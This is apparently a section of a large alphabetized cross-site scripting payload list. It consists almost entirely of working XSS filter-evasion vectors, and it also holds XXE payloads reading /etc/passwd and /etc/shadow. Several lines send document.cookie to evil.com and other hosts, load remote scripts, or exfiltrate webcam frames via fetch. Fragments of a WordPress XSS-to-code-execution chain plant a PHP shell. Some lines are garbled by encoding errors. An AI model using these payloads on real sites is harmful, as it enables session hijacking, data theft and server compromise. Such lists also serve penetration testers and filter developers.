- <! — <value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=”javas<![CDATA[cript:alert(‘XSS’);”>
- <! — <value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=”javas<![CDATA[cript:confirm(document.location);”>
- “”+{valueOf:alert}
- valueOf=alert;
- -{valueOf(){alert`:D`}}
- valueOf=alert;this+1;
- -{valueOf:location,toString:[].pop,0:javascript:alert%281%29.source,length:1}
- values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
- var a=0; ((a == 1) ? 2 : confirm(1));//
- var a = ��foo��/alert(9)//��;
- var a = ��foo��&&alert(9)//��;
- var a = ��foo��+alert(9)//��;
- var a= <%=str_a%>
- “){};var b=’al’+’ert()’;eval(b);if(shit=”
- var buttons =$(“[data-role=button]”);
- var data = “jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”;document.documentElement.innerHTML = data;
- var data = “jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”;document.head.outerHTML = data;
- var data = “jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”;document.write(data);document.close();
- variable[<script>]=*alert(1)</script>
- var m=’alert(0)’;var o=’’;for(var i=0;i<m.length;i++) {o+=’\\’+(m[i].charCodeAt().toString(8));}[][‘\143\157\156\163\164\162\165\143\164\157\162’][‘\143\157\156\163\164\162\165\143\164\157\162’](‘\141\154\145\162\164\50\60\51’)();[][‘constructor’][‘constructor’]
- var n = {a: “-alert(1)}//\”, b: “-alert(1)}//\”};
- var n = {a: “\”, b: “-alert(1)}//”};
- var n = {a: “$p”, b: “$p”};
- var n = {a: “$p”, b: “$q”};
- <var onmouseover=”prompt(1)”>KCF</var>
- <var onmouseover=”prompt(1)”>On Mouse Over</var>?
- <var onmouseover=”prompt(1)”>On Mouse Over</var>
- <var onmouseover=”prompt(1)”>renwax23</var>
- var q:String=loaderInfo.parameters[“q”].split(“\\”).join(“\\\\”);
- var re = /jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e/;
- var rewrittenBindings =ko.expressionRewriting.preProcessBindings(bindingsString, options),
- var str = ‘jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e’;
- var str = “jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”;
- “var x=new XMLHttpRequest();x.open(‘GET’,’//0');x.send();
- var{x:x,x=alert(1)}=1;
- var{x:y,}=1
- vbscript & # 00058; alert (1);
- vbscript:confirm(1);
- vbscript:alert(1);
- vbscript: alert (1);
- vbscript:alert(1);
- vbscript:alert(1); vbscript:alert(1); vbscr	ipt:alert(1)”
- vbscript:confirm(1);
- vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
- vbscript:Msgbox+1
- vbscript:prompt(1)#{“action”:1}
- vbscr & Tab; ipt: alert (1) “
- vbscr	ipt:alert(1)”
- vbscr	ipt:confirm(1)”
- v=d.createElement(‘video’);
- v=d.createElement(video);
- veris →group<svg/onload=alert(/XSS/)//
- <videogt;<source onerror=javascript:prompt(911)gt;
- <video id=XSS poster=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))//
- video-js.swf?readyFunction=alert(1)
- video-js.swf?readyFunction=alert%28document.domain%2b’%20XSSed!’%29
- <video onclick=popup=1;>
- <video onerror=alert(1337) </poster>
- <VideO/**/OnerroR=~alert(“1”)+/SrC>
- <video onerror=”javascript:alert(1)”><source>//INJECTX
- <video onerror=”javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))”><source>
- <video onerror=”javascript:javascript:alert(1)”><source>
- <video+onerror=’javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);’><source>%23
- <video+onerror=’javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};document.getElementById(%22safe123%22).click(test);’><source>%23
- <video onloadstart=alert(102)><source>
- <video onloadstart=alert(1)><source>
- <VidEo/oNLoaDStaRt=confirm(1)+/src>
- <video poster=javascript:alert(1)//></video>
- <video poster=javascript:javascript:alert(1)//
- <video/poster/onerror=alert()>
- <video/poster/onerror=alert(1)>
- <video/poster/onerror=prompt(1)>
- <video><source onerror=”alert(1)”>
- <video><source onerror=”javascript:alert(1)”>
- <video><source onerror=”javascript:alert(1)”>//INJECTX
- <Video> <source onerror = “javascript: alert (XSS)”>
- <video><source onerror=”javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))”>
- <video><source onerror=”javascript:javascript:alert(1)”>
- <video><source o?UTF-8?Q?n?error=”confirm(1)”>
- <video src=1 href=1 onerror=”javascript:alert(1)”></video>
- <video src=1 onerror=alert(1)>
- <video src=”http://www.w3schools.com/html5/movie.ogg" onloadedmetadata=”alert(1)” />
- <video src=”http://www.w3schools.com/html5/movie.ogg" onloadstart=”alert(1)” />
- <video/src/id=”onerror”onloadstart=top[id]=confirm;throw”32">
- <video src=. onerror=prompt(0)>
- “<video src=. onerror=prompt(0)>”
- <video src=_ onloadstart=”alert(1)”>
- <video src onratechange=”alert(1)”>
- <video/src=//w3schools.com/tags/movie.mp4%0Aautoplay/onplay=(confirm(1))>
- <video src=x onerror=alert(48)>
- <video src=x onerror=prompt(1);>
- <video src=x onerror=prompt(1);>
- <video src=”x” onloadstart=”alert(1)”>
- <video src=”x” onloadstart=”confirm(1)”>
- <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
- vml.xml:<xml><rect style=”height:100%;width:100%” id=”xss” onmouseover=”alert(1)” strokecolor=”white” strokeweight=”2000px” filled=”false”/></xml>
- v.src=URL.createObjectURL(s);v.play()},function(){});
- vulnerable”%3B%20alert(%27Mondays%27)%3B%20"
- ([,?,,,,?]=””+{},[??,??,??,??,,???,???,???,,,???]=[!!?]+!?+?.?)[?+=?+???+???+??+??+??+?+??+?+??][?](???+???+??+??+??+”(-~?)”)() // (V_V)
- <w contenteditable id=x onfocus=alert()>
- Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
- $ while :; do printf “j$ “; read c; echo $c | nc -lp PORT >/dev/null; done
- width: expression((window.r==document.cookie)?’’:alert(r=document.cookie))
- (window[(![]+[])[1] + (![]+[])[2] + (![]+[])[4] +
- window[“ale” + (!![]+[])[+!+[]]+(!![]+[])[+[]]](1)
- window.alert(1)
- window[“alert”](1)
- (window[��alert��])(9)
- window[��alert��](9)
- window.alert(“Bonjour !”);
- window.alert(“Bonjour !”);
- window[/alert/.source](9)
- window.location.assign(“http://xss.cx")
- window.location.replace(“http://stackoverflow.com");
- window.name
- window.name=’a\x01b’
- window.name=’hacked’;location.replace(‘about:blank’);
- window.name=”javascript:confirm((window.opener||window).document.cookie);”;
- window.open(‘http://target.com/?search=<svg/onload=window[localStorage.xss]=window.name//','javascript:alert(1)');
- window.open(“http://xss.cx","confirm(document.domain);", “”, false);
- window[Symbol.hasInstance]=eval
- win.location.href = “https://www.whatismyreferer.com";
- win = window.open(“https://www.paypal.com");
- with(document)alert(cookie)
- #with(document)body.appendChild(createElement
- with(document)body.appendChild(createElement(‘iframe onload=alert(1)>’),body.innerHTML+=”(IE)
- #with(document)body.appendChild(createElement(/script/.source)).src=atob(/Ly9icnV0ZWxvZ2ljLmNvbS5ici8y/.source)
- with(document)body.appendChild(createElement(‘script’)).src=’//DOMAIN’
- with(document)getElementsByTagName(‘head’)[0].appendChild(createElement(‘script’)).src=’//?.ws’
- with(document.__parent__)alert(1)
- with(location)with(hash)eval(substring(1))
- with(top)body.appendChild (createElement(‘script’)).src=’//0'
- \”};with(window){onload=function(){ with(document){k=cookie;};with(window){location=’http://evil.com/?a=test'%2bk;};}}//;
- with(x)for(i=d=c.width=200;j=i — /d;fillStyle=R(d+i,d/j,arc(99+(i-79)*S(T(t)),S(3*j+S(t*7)/4)*75,j>.9?5:30*S(3*j+.3),0,7),fill()))beginPath()
- $=’_wpnonce=’+/ce” value=”([^”]*?)”/.exec(x.responseText)[1]+’&newcontent=<?=`$_GET[brute]`;&action=update&’+f
- // wp_xss2rce.js 1/3
- // wp_xss2rce.js 2/3
- www.site.com/test.php?var=text;alert(1)//
- www.site.com/test.php?var=textv;alert(1)//
- <w=”/x=”y>”/ondblclick=`<`[confir\u006d``]>z
- wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
- x=”<%”;
- <x>%00%00%00%00%00%00%00<script>alert(1)</script>
- <
- <
- <
- <
- <
- <
- <
- <
- >
- >
- >
- >
- >
- >
- >
- >
- <
- <
- <
- <
- <
- <
- <
- <
- >
- >
- >
- >
- >
- >
- >
- >
- <
- <
- <
- <
- <
- <
- <
- <
- >
- >
- >
- >
- >
- >
- >
- >
- <
- <
- <
- <
- <
- <
- <
- <
- <img src=1 onerror=confirm(1)>
- >
- >
- >
- >
- >
- >
- >
- >
- <\x00img src=’1' onerror=alert(0) />
- →<! — — \x00> <img src=xxx:x onerror=javascript:alert(1)> →
- “‘`><\x00img src=xxx:x onerror=javascript:alert(1)>
- ‘`”><\x00script>javascript:alert(1)</script>
- \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
- <
- <
- <
- <
- <
- <
- <
- <
- >
- >
- >
- >
- >
- >
- >
- >
- <x%09onxxx=1
- <x%09onxxx=1
- <x%09onxxx=142
- <x~%0Aonfocus=alert(26) id=a tabindex=0>
- <x%0Aonxxx=1
- <x%0Aonxxx=1
- <x%0Aonxxx=143
- [\x0B]onmosemove=confirm(‘\Done\’)>
- <x%0Conxxx=1
- <x%0Conxxx=1
- <x%0Conxxx=144
- <x%0Donxxx=1
- <x%0Donxxx=1
- <x%0Donxxx=145
- (X,)=>1
- /x:1/:///%01javascript:alert(document.cookie)/
- <x 1=’1'onxxx=1
- <x 1=’1'onxxx=1
- <x 1=”1"onxxx=1
- <x 1=’1'onxxx=147
- <x 1=”1"onxxx=148
- <x 1=”>” onxxx=1
- <x 1=”>” onxxx=1
- <x 1=”>” onxxx=150
- →<! — — \x21> <img src=xxx:x onerror=javascript:alert(1)> →
- x%22%3E%3Cimg%20src=%22x%22%3E%3C! — %2522%2527 — %253E%253CSvg%2520O%256ELoad%253Dconfirm%2528/xss/%2529%253E
- \x27-confirm`1`-\x27
- <x%2F1=”>%22OnXxx%3D1
- <x%2Fonxxx=1
- <x%2Fonxxx=1
- <x%2Fonxxx=146
- \x3c
- <
- <
- \x3C
- <
- <
- <
- <
- <
- <
- “‘`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
- \x3cimg\u0020src=1\u0020onerror=alert(1)\x3e
- \x3Cimg\u0020src=1\u0020onerror=alert(1)\x3e
- ‘`”><\x3Cscript>javascript:alert(1)</script>
- ‘`”><\x3Cscript>javascript:alert(1)</script>
- \x3Cscript>javascript:alert(1)</script>
- \x3csVg/<sVg/oNloAd=alert()//>\x3e
- <script>alert('xss')</script>
- X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
- \x3e
- >
- >
- \x3E
- >
- >
- >
- >
- >
- >
- <! — \x3E<img src=xxx:x onerror=javascript:alert(1)> →
- →<! — — \x3E> <img src=xxx:x onerror=javascript:alert(1)> →
- `ĕ™ĔąĒĖb—ĈāĔĖ@9Ġĕĕ9A`Gĕ™ĔąĒĖb
- `ĕ™ĔąĒĖb—ĈāĔĖ@9Ġĕĕ9A`&#xĕ™ĔąĒĖb
- \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
- <x %6Fnerror=confirm(133)
- <x %6Fnxxx=1
- <x %6Fnxxx=1
- tţŃŢőŠŤvŁŔŅŢŤPGŰţţGQt&WţŃŢőŠŤv
- tţŃŢőŠŤvŁŔŅŢŤPGŰţţGQtWţŃŢőŠŤv
- “>/XaDoS/><script>alert(document.cookie)</script>
- “>/XaDoS/><script>alert(document.cookie)</script><script src=”http://www.site.com/XSS.js"></script>
- x”);$=alert, $(1);//
- !{x(){alert(1)}}.x()
- xa?</title><img src%3dx onerror%3dconfirm(1)>
- [\xC0][\xBC]script>alert(‘XSS’);[\xC0][\xBC]/script>
- [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
- x=’c2.drawImage(v,0,0,640,480);fetch(“//HOST/”+c2.canvas.toDataURL())’;
- x=c2.drawImage(v,0,0,640,480);fetch(//HOST/+c2.canvas.toDataURL());
- [][x=’constructor’][x](‘alert(1)’)()
- <x contenteditable onblur=alert(108)>lose focus!
- <x contenteditable onblur=alert(1)>lose focus!
- <x contenteditable onblur=alert(1)>lose focus!
- <x contenteditable onfocus=alert(115)>focus this!
- <x contenteditable onfocus=alert(1)>focus this!
- <x contenteditable onfocus=alert(1)>focus this!
- <x contenteditable oninput=alert(116)>input here!
- <x contenteditable oninput=alert(1)>input here!
- <x contenteditable oninput=alert(1)>input here!
- <x contenteditable onkeydown=alert(117)>press any key!
- <x contenteditable onkeydown=alert(1)>press any key!
- <x contenteditable onkeydown=alert(1)>press any key!
- <x contenteditable onkeypress=alert(118)>press any key!
- <x contenteditable onkeypress=alert(1)>press any key!
- <x contenteditable onkeypress=alert(1)>press any key!
- <x contenteditable onkeyup=alert(119)>press any key!
- <x contenteditable onkeyup=alert(1)>press any key!
- <x contenteditable onkeyup=alert(1)>press any key!
- <x contenteditable onpaste=alert(125)>paste here!
- <x contenteditable onpaste=alert(1)>paste here!
- <x contextmenu=”>”><a/value=”aaaaaaaaa”/onmousemove=%0Dprompt(196)%0A>#x
- <x data-bind=”.:confirm(1)”>
- <x data-bind=”.:\u0061lert(1)”>
- x=’ev’+’al’
- x=eval
- ��x:expr/**/ession(alert(1))��
- x:expr/**/ession(alert(1))
- x.fillText(“ASCII”,C=0,40)
- x.fillText(“Xo= “[C],t*54,Y*22)
- x.fillText(“Xw=^ “[C],t*54,Y*22)
- x.font=”3em’”
- x.font=”3em A”
- <x ‘=”foo”><x foo=’><img src=x onerror=alert(1)//’>
- <x ‘=”foo”><x foo=’><img src=x onerror=javascript:alert(1)//’>
- xlink:href=”javascript:alert(49)”>CLICKME</maction> </math>
- x=(lol=alert(1),x=class x extends x{constructor(){alert(1)}}()()()()())
- x=(lol=alert(1),x=class x extends x{constructor(){alert(1)}}()()()()())=>class x extends x{}()()();x()
- <xml id=cdcat><note><to>%26lt;span style=x:exp<![CDATA[r]]>ession(confirm(3))%26gt;hello%26lt;/span%26gt;</to></note></xml><table border=%221%22 datasrc=%22%23cdcat%22><tr><td><span datafld=%22to%22 DATAFORMATAS=html></span></td></tr></table>
- <XML ID=I><X><C><![CDATA[<IMG id=XSS SRC=”javas]]<![CDATA[cript:alert(‘XSS’);”>]]</C><X></xml>
- <xml ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]>
- <;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=”;javas]]>;<;![CDATA[cript:alert(‘;XSS’;);”;>;]]>;
- <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]>
- <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(XSS);”>]]>
- <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
- <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]> </C></X></xml><SPAN DATASRC=#IDATAFLD=C DATAFORMATAS=HTML></SPAN>
- <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(XSS);”>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]<![CDATA[cript:javascript:alert(1);”>]]</C><X></xml>
- <XML ID=I><X><C><![<IMG SRC=”javas]]<![cript:document.vulnerable=true;”>]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
- <xml id=”X”><a><b><script>alert(‘XSS’);</script>;<b></a></xml>
- <xml id=”X”><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
- <XML ID=”XSS”><I><B><IMG id=XSS SRC=”javas<! — →cript:alert(‘XSS’)”></B></I></XML><SPAN DATAid=XSS SRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
- <XML ID=”xss”><I><B><IMG SRC=”javas<! — →cript:alert(XSS^
- <;XML ID=”;xss”;>;<;I>;<;B>;<;IMG SRC=”;javas<;! — →;cript:alert(‘;XSS’;)”;>;<;/B>;<;/I>;<;/XML>;
- <XML ID=”xss”><I><B><IMG SRC=”javas<! — →cript:alert(‘XSS’)”></B></I></XML><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
- <XML ID=”xss”><I><B><IMG SRC=”javas<! — →cript:document.vulnerable=true”></B></I></XML><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></span>
- <XML ID=”xss”><I><B><IMG SRC=”javas<! —
- <XML ID=”xss”><I><B><IMG SRC=”javas<! — →cript:alert(‘XSS’)”></B></I></XML>
- <xml ID=”xss”><I><B><IMG SRC=”javas<! — →cript:alert(‘XSS’)”></B></I></xml><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <xml id=”xss” src=”%(htc)s”></xml> <label dataformatas=”html” datasrc=”#xss” datafld=”payload”></label>
- <XML id=XSS SRC=”http://xxxx.com/xsstest.xml" ID=I></XML>
- <XML id=XSS SRC=”xsstest.xml” ID=I></XML><SPAN DATAid=XSS SRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <XML id=XSS><X><C><![CDATA[<IMG id=XSS SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]></C></X><xml><SPAN DATAid=XSS SRC=#I DATAFLD=CDATAFORMATAS=HTML></SPAN>
- <xml:namespace prefix=t><import namespace=t implementation=…..
- <?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”>
- xmlns=”http://www.w3.org/2000/svg"><defs><font id=”x”><font-face font-family=”y”/></font></defs></svg>
- xmlns:x=”http://w3.org/1999/xhtml “>alert(1)
- <xml onPropertyChange xml onPropertyChange=”javascript:javascript:alert(1)”></xml onPropertyChange>
- <;XML SRC=”;http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>;
- <XML SRC=”http://ha.ckers.org/xsstest.xml" ID=I></XML>
- <XML SRC=”http://ha.ckers.org/xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <XML src=”javascript:alert(‘X11SS’);”>
- <XML SRC=”javascript:alert(‘XSS’);”>
- <XML SRC=”javascript:alert(“XSS”)
- <xml src=”javascript:document.vulnerable=true;”>
- <XML SRC=”xsstest.xml” ID=I></XML>
- <XML SRC=”xsstest.xml” ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <XML SRC=”xsstest.xml” ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <?xml-stylesheet href=”javascript:alert(1)”?><root/>
- <?xml-stylesheet type=”text/css”?><!DOCTYPE x SYSTEM “test.dtd”><x>&x;</x>
- <?xml-stylesheet type=”text/css”?><root style=”x:expression(write(1))”/>
- <?xml-stylesheet type=”text/css”?><root style=”x:expression(write(1))”/>
- <?xml-stylesheet type=”text/css”?><root style=”x:expression(write(1))”/> // Works in IE7 ? http://html5sec.org/#77
- <?xml version=”1.0" encoding=”ISO-8859–1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM “file://c:/boot.ini”>]><foo>&xee;</foo>
- <?xml version=”1.0" encoding=”ISO-8859–1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM “file:///dev/random”>]><foo>&xee;</foo>
- <?xml version=”1.0" encoding=”ISO-8859–1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM “file:///etc/passwd”>]><foo>&xee;</foo>
- <?xml version=”1.0" encoding=”ISO-8859–1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM “file:///etc/shadow”>]><foo>&xee;</foo>
- <?xml version=”1.0" encoding=”ISO-8859–1"?><foo><![CDATA[‘ or 1=1 or ‘’=’]]></foof>
- <?xml version=”1.0" encoding=”ISO-8859–1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(‘gotcha’);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
- <?xml version=”1.0" encoding=”ISO-8859–1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(‘XSS’);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
- <?xml version=”1.0" encoding=”utf-8" ?><x:script
- <?xml version=”1.0"?><html:html xmlns:html=’http://www.w3.org/1999/xhtml'>
- <?xml version=”1.0"?><html:html xmlns:html=’http://www.w3.org/1999/xhtml'><html:script>alert(document.cookie);</html:script></html:html>
- <?xml version=”1.0"?><html:html xmlns:html=’http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
- <?xml version=”1.0"?><html><script xmlns=”http://www.w3.org/1999/xhtml">alert(1)</script></html>
- <?xml version=”1.0"?><html><script xmlns=”http://www.w3.org/1999/xhtml">alert(8)</script></html>
- <?xml version=”1.0"?><script xmlns=”http://www.w3.org/1999/xhtml">alert(9)</script>
- <?xml version=”1.0" ?><someElement><a xmlns:a=’http://www.w3.org/1999/xhtml'><a:body onload=’alert(1)’/></a></someElement>
- <?xml version=”1.0" ?><someElement> <a xmlns:a=’http://www.w3.org/1999/xhtml'><a:body onload=’alert(1)’/></a></someElement>
- <?xml version=”1.0" standalone=”no”?><!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload=”alert(1)”
- <?xml version=”1.0" standalone=”no”?><!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload=”alert(1)” xmlns=”http://www.w3.org/2000/svg"><defs><font id=”x”><font-face font-family=”y”/></font></defs></svg>
- <?xml version=”1.0"?><x:script xmlns:x=”http://www.w3.org/1999/xhtml">alert(27)</x:script>
- <xmp><img alt=”</xmp><img src=xx:x onerror=alert(1)//”>
- <xmp><img alt=”</xmp><img src=xx:x onerror=confirm(1)//”>
- <xmp><%</xmp><img alt=’%></xmp><img src=xx:x onerror=alert(1)//’>
- x=new class extends Function{}(‘alert(1)’);
- x=new class extends Function{}(‘alert(1)’);x=new x;
- x=new x;
- x=new XMLHttpRequest()
- x = new XMLHttpRequest();
- <x o%6Eerror=prompt(134)
- <x o%6Exxx=1
- <x o%6Exxx=1
- <x on%78error=confirm(135)
- <x on%78xx=1
- <x on%78xx=1
- <x onafterscriptexecute=alert(127)>
- <x onbeforescriptexecute=alert(128)>
- <x onclick=alert(109)>click this!
- <x onclick=alert(1)>click this!
- <x onclick=alert(1)>click this!
- <x oncontextmenu=alert(111)>right click this!
- <x oncontextmenu=alert(1)>right click this!
- <x oncontextmenu=alert(1)>right click this!
- <x oncopy=alert(110)>copy this!
- <x oncopy=alert(1)>copy this!
- <x oncopy=alert(1)>copy this!
- <x oncut=alert(112)>copy this!
- <x oncut=alert(1)>copy this!
- <x oncut=alert(1)>copy this!
- <x+oncut=y=prompt,y`1`>renwax23
- <x oncut=y=prompt,y``>z
- <x ondblclick=alert(113)>double click this!
- <x ondblclick=alert(1)>double click this!
- <x ondblclick=alert(1)>double click this!
- <x ondrag=alert(114)>drag this!
- <x ondrag=alert(1)>drag this!
- <x ondrag=alert(1)>drag this!
- <x onerror%3Dprompt(136)
- <x onload’=confirm(1)
- <x onmousedown=alert(120)>click this!
- <x onmousedown=alert(1)>click this!
- <x onmousedown=alert(1)>click this!
- <x onmouseenter=alert(126)>hover me!
- <x onmousemove=alert(121)>hover this!
- <x onmousemove=alert(1)>hover this!
- <x onmousemove=alert(1)>hover this!
- <x onmouseout=alert(122)>hover this!
- <x onmouseout=alert(1)>hover this!
- <x onmouseout=alert(1)>hover this!
- <x onmouseover=alert(1)>
- <x onmouseover=alert(123)>hover this!
- <x onmouseover=alert(1)>hover this!
- <x onmouseover=alert(1)>hover this!
- <x onmouseup=alert(124)>click this!
- <x onmouseup=alert(1)>click this!
- <x onmouseup=alert(1)>click this!
- x.onreadystatechange=function(){if(this.readyState==4){write(x.responseText)}}”
- <x onwebkitanimationend=alert(74)><style>X{animation:S}@keyframes S{}
- <x </onxxx=1
- <x </onxxx=1
- <x/onxxx=1
- <x/onxxx=1
- <x OnXxx=1
- <x OnXxx=1
- <X onxxx=1
- <X onxxx=1
- <X OnXxx=1
- <X OnXxx=1
- <X onxxx=137
- <x OnXxx=138
- <X OnXxx=139
- <x onxxx=140 onxxx=1400
- <x/onxxx=141
- <x </onxxx=149
- <x onxxx=1 onxxx=1
- <x onxxx%3D1
- <x onxxx=alert(1) 1=’
- <x onxxx=alert(152) 152=’
- x.open(‘GET’,p+f,0)
- x.open(POST, home.php, true);
- ?x=<script%20src=data:&x=alert(1);>
- “><<x>script>confirm(2)<<x>/<x>script>
- x’\”></script><img src=x onerror=alert(1)>
- <x:script xmlns:x=”https://sql--injection.blogspot.co.uk">alert('xss');</x:script>
- <x:script xmlns:x=”http://www.w3.org/1999/xhtml">alert(1);</x:script>
- <x:script xmlns:x=”http://www.w3.org/1999/xhtml">alert('xss');</x:script>
- x.send()
- x.send(post=</textarea><br><a href= + document.URL + >Check this!</a>);
- x.setRequestHeader(Content-type, application/x-www-form-urlencoded);
- x setter=eval,x=1
- ;! — “<XSS>=&{()}”
- // XSS //
- ‘;’;;! — “;<;XSS>;=&;{()}
- ‘’;! — “<XSS>=&{()}
- xss:ex/*XSS*//*/* ?/pression(alert(“XSS”))’>
- xss:ex/*XSS*//**pression(alert(“XSS”))’>
- /?xss=500); alert(document.cookie);//
- xss:ex/*XSS*//*/*/pression(alert(\”XSS\”))’>
- !#$%&’*+-/=?^@xss.cx”>_`{}|~@xss.cx
- xss:expression(alert(/Xss/)
- xss:expression(alert(/Xss-By-Muhaddi/)
- {}*{xss:expression(open(alert(1)))}
- xss:ex/*XSS*//*/*/pression(alert(“XSS”))’>
- <! XSS=”><img src=xx:x onerror=alert(1)//”>
- <! XSS=”><img src=xx:x onerror=confirm(1)//”>
- [XSS](javascript:confirm(6))
- <xss><script>alert(‘WXSS’)</script></vulnerable>
- xss →<! — <script>xss
- <XSS STYLE=”behavior: url(%(htc)s);”>
- <;XSS STYLE=”;behavior: url(http://ha.ckers.org/xss.htc);";>;
- <XSS STYLE=”behavior: url(http://ha.ckers.org/xss.htc);">
- <XSS STYLE=”behavior: url(xss.htc);”>
- <~/XSS STYLE=xss:expression(alert(‘XSS’))>
- <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))>
- <;XSS STYLE=”;xss:expression(alert(‘;XSS’;))”;>;
- </XSS STYLE=xss:expression(alert(‘XSS’))>
- </XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))>
- <XSS STYLE=”xss:expression(alert(‘XSS’))”>
- <XSS STYLE=xss:e/**/xpression(alert(‘XSS’))>
- <XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))>
- XSS STYLE=xss:e/**/xpression(alert(‘XSS’))>
- XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))>
- <XSS STYLE=”xss:expression(document.vulnerable=true)”>
- <XSS STYLE=”xss:expression(javascript:alert(1))”>
- <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
- <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location=”http://www.procheckup.com/?sid="%2bdocument.cookie)>
- <xss:xss>XSS</xss:xss>
